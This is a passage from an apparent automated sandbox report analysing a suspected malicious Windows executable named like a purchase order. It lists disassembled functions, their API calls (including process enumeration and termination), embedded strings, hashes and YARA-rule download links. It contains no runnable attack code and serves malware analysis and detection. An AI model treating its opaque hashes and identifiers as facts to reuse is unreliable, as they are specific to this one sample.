                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: Variant$ClearInit$_memset
                                                                    • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                    • API String ID: 2862541840-625585964
                                                                    • Opcode ID: 2cbc5fc16390dbe5e38784c12e90b53ad1e19ebc58d583ce4b883e84669f1ad0
                                                                    • Instruction ID: 5fcad8f2e6a539a6aafbd2ab5b08b6ac8ec52204cb406d72847a59e0b172a6e1
                                                                    • Opcode Fuzzy Hash: 2cbc5fc16390dbe5e38784c12e90b53ad1e19ebc58d583ce4b883e84669f1ad0
                                                                    • Instruction Fuzzy Hash: 5191BF71A00219ABDF20EFA5C848FAFB7B8EF45718F14811DF515AB290D7709A45CFA4
                                                                    Function 00C8975D Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 242COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00C6710A: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00C67044,80070057,?,?,?,00C67455), ref: 00C67127
                                                                      • Part of subcall function 00C6710A: ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00C67044,80070057,?,?), ref: 00C67142
                                                                      • Part of subcall function 00C6710A: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00C67044,80070057,?,?), ref: 00C67150
                                                                      • Part of subcall function 00C6710A: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00C67044,80070057,?), ref: 00C67160
                                                                    • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 00C89806
                                                                    • _memset.LIBCMT ref: 00C89813
                                                                    • _memset.LIBCMT ref: 00C89956
                                                                    • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 00C89982
                                                                    • CoTaskMemFree.OLE32(?), ref: 00C8998D
                                                                    Strings
                                                                    • NULL Pointer assignment, xrefs: 00C899DB
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                                                    • String ID: NULL Pointer assignment
                                                                    • API String ID: 1300414916-2785691316
                                                                    • Opcode ID: b64423779bb16b27246fb5e7fafc6149935436ba2482a811614a4b6d30dad124
                                                                    • Instruction ID: e283f0b4ae65ca5ca8902388a9a5f6132ab9cb10487b4979480b6e9ef31e5b87
                                                                    • Opcode Fuzzy Hash: b64423779bb16b27246fb5e7fafc6149935436ba2482a811614a4b6d30dad124
                                                                    • Instruction Fuzzy Hash: 63915971D00229EBDB10EFA5DC84EEEBBB9EF09314F10411AF419A7281DB719A45DFA0
                                                                    Function 00C96D80 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 143windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00C96E24
                                                                    • SendMessageW.USER32(?,00001036,00000000,?), ref: 00C96E38
                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00C96E52
                                                                    • _wcscat.LIBCMT ref: 00C96EAD
                                                                    • SendMessageW.USER32(?,00001057,00000000,?), ref: 00C96EC4
                                                                    • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00C96EF2
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$Window_wcscat
                                                                    • String ID: SysListView32
                                                                    • API String ID: 307300125-78025650
                                                                    • Opcode ID: 8e275625f248aa9f9fdf9fb7db613e7aea1655e44db3e24cc7b5540c055fb930
                                                                    • Instruction ID: 8c0a68de841b752239e52dc5b8a5f3fb40a0a7d5ba1db87c17ae3fc457474c98
                                                                    • Opcode Fuzzy Hash: 8e275625f248aa9f9fdf9fb7db613e7aea1655e44db3e24cc7b5540c055fb930
                                                                    • Instruction Fuzzy Hash: F041A171A00348ABDF219F64CC89BEE77F8EF08350F10042AF594E71D1D6719E858B60
                                                                    Function 00C8E933 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00C73C55: CreateToolhelp32Snapshot.KERNEL32 ref: 00C73C7A
                                                                      • Part of subcall function 00C73C55: Process32FirstW.KERNEL32(00000000,?), ref: 00C73C88
                                                                      • Part of subcall function 00C73C55: CloseHandle.KERNEL32(00000000), ref: 00C73D52
                                                                    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00C8E9A4
                                                                    • GetLastError.KERNEL32 ref: 00C8E9B7
                                                                    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00C8E9E6
                                                                    • TerminateProcess.KERNEL32(00000000,00000000), ref: 00C8EA63
                                                                    • GetLastError.KERNEL32(00000000), ref: 00C8EA6E
                                                                    • CloseHandle.KERNEL32(00000000), ref: 00C8EAA3
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                    • String ID: SeDebugPrivilege
                                                                    • API String ID: 2533919879-2896544425
                                                                    • Opcode ID: df67ad95767f63fe4f2d7dfb19c80b9eadf9da8ed5dff92fc598276a4edd079a
                                                                    • Instruction ID: 76eaab010390adab8b063e2d09c79454b2245d74a366a3a57ecdfef51493e97b
                                                                    • Opcode Fuzzy Hash: df67ad95767f63fe4f2d7dfb19c80b9eadf9da8ed5dff92fc598276a4edd079a
                                                                    • Instruction Fuzzy Hash: DB41CD31200200AFDB24EF24CCA6FAEBBA5BF41714F14841DF9069B2D2CB74E945EB95
                                                                    Function 00C72F94 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 82windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • LoadIconW.USER32(00000000,00007F03), ref: 00C73033
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: IconLoad
                                                                    • String ID: blank$info$question$stop$warning
                                                                    • API String ID: 2457776203-404129466
                                                                    • Opcode ID: 68fd4215e15c6ceede2cae2977d47c9c8d8d748c70b77048b4a759991e78efb8
                                                                    • Instruction ID: 07f2233d92cb7ae3d358c5e3ebe4846cb5e2a6b899ea46439260cd84e7f5a591
                                                                    • Opcode Fuzzy Hash: 68fd4215e15c6ceede2cae2977d47c9c8d8d748c70b77048b4a759991e78efb8
                                                                    • Instruction Fuzzy Hash: 98113A313483C6BEEB249A95DC83EAF779CDF15360F20802EF908A6181DBB05F4476A0
                                                                    Function 00C742F8 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 47windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00C74312
                                                                    • LoadStringW.USER32(00000000), ref: 00C74319
                                                                    • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00C7432F
                                                                    • LoadStringW.USER32(00000000), ref: 00C74336
                                                                    • _wprintf.LIBCMT ref: 00C7435C
                                                                    • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00C7437A
                                                                    Strings
                                                                    • %s (%d) : ==> %s: %s %s, xrefs: 00C74357
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: HandleLoadModuleString$Message_wprintf
                                                                    • String ID: %s (%d) : ==> %s: %s %s
                                                                    • API String ID: 3648134473-3128320259
                                                                    • Opcode ID: 7b345bb96d21a6ce83ae02f3de9671829caf27125509824aa2573da5a328b68f
                                                                    • Instruction ID: 61eb342e70d170672b4b4fe05f074d439cf747c05a5c8b2b945028e70993c84b
                                                                    • Opcode Fuzzy Hash: 7b345bb96d21a6ce83ae02f3de9671829caf27125509824aa2573da5a328b68f
                                                                    • Instruction Fuzzy Hash: 81014FF2900208BFE71197A0DD8DFFA776CDB08301F0005AAB749E6051EA749E864B71
                                                                    Function 00C9D43E Relevance: 12.3, APIs: 8, Instructions: 257windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00C12612: GetWindowLongW.USER32(?,000000EB), ref: 00C12623
                                                                    • GetSystemMetrics.USER32(0000000F), ref: 00C9D47C
                                                                    • GetSystemMetrics.USER32(0000000F), ref: 00C9D49C
                                                                    • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 00C9D6D7
                                                                    • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 00C9D6F5
                                                                    • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 00C9D716
                                                                    • ShowWindow.USER32(00000003,00000000), ref: 00C9D735
                                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 00C9D75A
                                                                    • DefDlgProcW.USER32(?,00000005,?,?), ref: 00C9D77D
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                                                                    • String ID:
                                                                    • API String ID: 1211466189-0
                                                                    • Opcode ID: 3c0dc2d8b3fc7faa238d0c8ebe5de6f8c1168da4436e6ca3d9eaed1bb96f75bb
                                                                    • Instruction ID: ae76cc01a773fa6a272d38739abbde7abb43cb49a430391e17751df2162d7845
                                                                    • Opcode Fuzzy Hash: 3c0dc2d8b3fc7faa238d0c8ebe5de6f8c1168da4436e6ca3d9eaed1bb96f75bb
                                                                    • Instruction Fuzzy Hash: 11B18B75600215EBDF14CF69C9C97AD7BB1BF04701F09806AFC5AAB299D734AA90CB50
                                                                    Function 00C12A5B Relevance: 12.1, APIs: 8, Instructions: 129COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00C4C1C7,00000004,00000000,00000000,00000000), ref: 00C12ACF
                                                                    • ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,00C4C1C7,00000004,00000000,00000000,00000000,000000FF), ref: 00C12B17
                                                                    • ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,00C4C1C7,00000004,00000000,00000000,00000000), ref: 00C4C21A
                                                                    • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00C4C1C7,00000004,00000000,00000000,00000000), ref: 00C4C286
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: ShowWindow
                                                                    • String ID:
                                                                    • API String ID: 1268545403-0
                                                                    • Opcode ID: f8ea1bf13328b20a89c7ca2d1d3cf66bab2531a61a3253061f3a85315999c0dc
                                                                    • Instruction ID: 005a299851753a5cf2a580985d6b3ba21bdef15e8f1a855525b087cd837b5bd0
                                                                    • Opcode Fuzzy Hash: f8ea1bf13328b20a89c7ca2d1d3cf66bab2531a61a3253061f3a85315999c0dc
                                                                    • Instruction Fuzzy Hash: 4B41EA396097809BC7798B299CCCBEE7B95BF47310F14841EE05786571C6B1A9E1F720
                                                                    Function 00C770C6 Relevance: 12.1, APIs: 8, Instructions: 101fileCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • InterlockedExchange.KERNEL32(?,000001F5), ref: 00C770DD
                                                                      • Part of subcall function 00C30DB6: std::exception::exception.LIBCMT ref: 00C30DEC
                                                                      • Part of subcall function 00C30DB6: __CxxThrowException@8.LIBCMT ref: 00C30E01
                                                                    • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00C77114
                                                                    • EnterCriticalSection.KERNEL32(?), ref: 00C77130
                                                                    • _memmove.LIBCMT ref: 00C7717E
                                                                    • _memmove.LIBCMT ref: 00C7719B
                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 00C771AA
                                                                    • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 00C771BF
                                                                    • InterlockedExchange.KERNEL32(?,000001F6), ref: 00C771DE
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                                                                    • String ID:
                                                                    • API String ID: 256516436-0
                                                                    • Opcode ID: 9d6387d184946486b0af66b1591458f468b47db02bcb31d68a680f3b6052740c
                                                                    • Instruction ID: c8cb10215b02209d002426a765cc860266763f804a3cf0aebf770c81f6c96624
                                                                    • Opcode Fuzzy Hash: 9d6387d184946486b0af66b1591458f468b47db02bcb31d68a680f3b6052740c
                                                                    • Instruction Fuzzy Hash: CE315332900205EBCF00DFA4DC89BAE7778EF45710F2441A9E904DB256D7309E11DB60
                                                                    Function 00C961D3 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • DeleteObject.GDI32(00000000), ref: 00C961EB
                                                                    • GetDC.USER32(00000000), ref: 00C961F3
                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00C961FE
                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 00C9620A
                                                                    • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00C96246
                                                                    • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00C96257
                                                                    • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00C9902A,?,?,000000FF,00000000,?,000000FF,?), ref: 00C96291
                                                                    • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00C962B1
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                    • String ID:
                                                                    • API String ID: 3864802216-0
                                                                    • Opcode ID: 4444c65f614008e1d4c47511c42a105d42721a1a3ed51537e4b8342cbb28ec4a
                                                                    • Instruction ID: d62c92213ec2e4f95ad69bde290e27cd2177264f5b14a9fa1dda9663884c46c8
                                                                    • Opcode Fuzzy Hash: 4444c65f614008e1d4c47511c42a105d42721a1a3ed51537e4b8342cbb28ec4a
                                                                    • Instruction Fuzzy Hash: E9316D72201614BFEF118F60CC8AFEA3BA9EF49765F044066FE08DA191C6759D52CB60
                                                                    Function 00C6BBAF Relevance: 12.1, APIs: 8, Instructions: 92COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: _memcmp
                                                                    • String ID:
                                                                    • API String ID: 2931989736-0
                                                                    • Opcode ID: 50203e17267c3082cc1893b79dfda415ca5ea9cb36eaa1c89a5ad3c6da24aeb6
                                                                    • Instruction ID: 1d42c36059b607c3df27dce4205f1c19e50c5ff9a57d01e33851d05fe3bb6350
                                                                    • Opcode Fuzzy Hash: 50203e17267c3082cc1893b79dfda415ca5ea9cb36eaa1c89a5ad3c6da24aeb6
                                                                    • Instruction Fuzzy Hash: 9E21F0616012267FE2347626ADC2FFB739CAE5139CF084020FD05D6643EB65DF91D2A1
                                                                    Function 00C7EB23 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 323COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00C19837: __itow.LIBCMT ref: 00C19862
                                                                      • Part of subcall function 00C19837: __swprintf.LIBCMT ref: 00C198AC
                                                                      • Part of subcall function 00C2FC86: _wcscpy.LIBCMT ref: 00C2FCA9
                                                                    • _wcstok.LIBCMT ref: 00C7EC94
                                                                    • _wcscpy.LIBCMT ref: 00C7ED23
                                                                    • _memset.LIBCMT ref: 00C7ED56
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                                    • String ID: X
                                                                    • API String ID: 774024439-3081909835
                                                                    • Opcode ID: a5262432dc4ddc3185e32d9dc9effda73e396588e0eee43b1f5a3418bf57495f
                                                                    • Instruction ID: f221e7351baf5345996c7a027753f7bdd997ee66728ec72efdd78e0da62365ae
                                                                    • Opcode Fuzzy Hash: a5262432dc4ddc3185e32d9dc9effda73e396588e0eee43b1f5a3418bf57495f
                                                                    • Instruction Fuzzy Hash: A1C17271508300DFC724EF24C855A9AB7E4FF8A310F10896DF899972A2DB31ED45EB82
                                                                    Function 00C11424 Relevance: 10.7, APIs: 7, Instructions: 219COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: dc5a5b969169d6b6907fc238d08bd80753ff48f9d2fac5192ff4cf3fe1278d92
                                                                    • Instruction ID: db8eebb2e178521de9552a03f9829104710d0c920a3bd47e8da2b5e061099cfc
                                                                    • Opcode Fuzzy Hash: dc5a5b969169d6b6907fc238d08bd80753ff48f9d2fac5192ff4cf3fe1278d92
                                                                    • Instruction Fuzzy Hash: 82716030900109EFDB04CF59CC49AFEBB79FF86710F188159FA15AA251C734AA51DFA4
                                                                    Function 00C86B76 Relevance: 10.7, APIs: 7, Instructions: 212COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: d20bb73e2be5e6731296bf5bd4cc74b77c79f1604883ac7991ae6b7451b7da9c
                                                                    • Instruction ID: a37be1d37d29a41b246be232c7596b8cd41d874739b9347925f5c8b3a1db61f8
                                                                    • Opcode Fuzzy Hash: d20bb73e2be5e6731296bf5bd4cc74b77c79f1604883ac7991ae6b7451b7da9c
                                                                    • Instruction Fuzzy Hash: 4261AD71208300ABC710FB24CC96FAFB7A8EF85718F10491DF5559B292DA30EE45E796
                                                                    Function 00C9B351 Relevance: 10.7, APIs: 7, Instructions: 199windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • IsWindow.USER32(017B5A08), ref: 00C9B3EB
                                                                    • IsWindowEnabled.USER32(017B5A08), ref: 00C9B3F7
                                                                    • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 00C9B4DB
                                                                    • SendMessageW.USER32(017B5A08,000000B0,?,?), ref: 00C9B512
                                                                    • IsDlgButtonChecked.USER32(?,?), ref: 00C9B54F
                                                                    • GetWindowLongW.USER32(017B5A08,000000EC), ref: 00C9B571
                                                                    • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 00C9B589
                                                                    Memory Dump Source
